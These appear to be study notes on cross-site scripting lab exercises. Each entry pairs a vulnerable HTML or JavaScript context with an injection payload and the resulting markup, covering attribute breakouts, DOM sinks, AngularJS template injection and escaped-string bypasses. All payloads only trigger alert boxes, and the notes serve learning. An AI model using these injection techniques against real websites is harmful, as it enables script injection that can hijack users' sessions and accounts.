Search for: <script>alert(1)</script>
Post new comment: <script>alert(1)</script>
Context:
<input maxlength="600" type="text" placeholder="Search the blog..." name="search" value="{HERE}">Exploit:
" onfocus=alert(1) autofocus foo="
Result:
<input name="search" value="" onfocus=alert(1) autofocus foo="">Context:
<a id="author" href="{HERE}">My web</a>Exploit:
javascript:alert(1)
Context:
function trackSearch(query) {
document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
}Exploit:
" onload="alert(1)"
Result:
<img src="/resources/images/tracker.gif?searchTerms="" onload="alert(1)">Context:
var stores = ["London","Paris","Milan"];
var store = (new URLSearchParams(window.location.search)).get('storeId');
document.write('<select name="storeId">');
if(store) {
document.write('<option selected>'+store+'</option>');
}
...
document.write('</select>');Exploit:
storeId=</option></select><script>alert(1)</script>
Result:
<select name="storeId">
<option selected></option>
</select>
<script>alert(1)</script>
</option>
</select>Context:
<h1><span>0 search results for '</span><span id="searchMessage"></span><span>'</span></h1>
<script>
function doSearchQuery(query) {
document.getElementById('searchMessage').innerHTML = query;
}
var query = (new URLSearchParams(window.location.search)).get('search');
if(query) {
doSearchQuery(query);
}
</script>Exploit:
<img src=0 onerror="alert(1)">
Result:
<span id="searchMessage"><img src=0 onerror="alert(1)"></span>Context:
$(function() {
$('#backLink').attr("href", (new URLSearchParams(window.location.search)).get('returnPath'));
});Exploit:
returnPath=javascript:alert(1)
Context:
<h1 ng-app="" class="ng-scope">0 search results for '{HERE}'</h1>Exploit:
{{$on.constructor('alert(1)')()}}
Result:
<h1 ng-app="" class="ng-scope">0 search results for '{{$on.constructor('alert(1)')()}}'</h1>Context:
var searchTerms = '{HERE}';Exploit:
</script><script>alert(1)</script>
Result:
var searchTerms = '</script>
<script>alert(1)</script>
';The reason this works is that the browser first performs HTML parsing to identify the page elements including blocks of script, and only later performs JavaScript parsing to understand and execute the embedded scripts.
Context:
var searchTerms = '{HERE}';Exploit:
';alert(1);//
Result:
var searchTerms = '';alert(1);//';Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped
Context:
var searchTerms = '{HERE}';Exploit:
\';alert(1);//
Result:
var searchTerms = '\\';alert(1);// ';Trick is that the \ is also escaped!
Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped
Context:
<a id="author" href="http://www.foo.bar" onclick="var tracker={track(){}};tracker.track('{HERE}');">Web</a>Exploit:
http://foo.bar');alert(1);//
Result:
<a id="author" href="http://www.foo.bar" onclick="var tracker={track(){}};tracker.track('http://foo.bar');alert(1);//');">Web</a>Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped
Context:
var message = `0 search results for '{HERE}'`;Exploit:
${alert(document.domain)}
Result:
var message = `0 search results for '${alert(document.domain)}'`;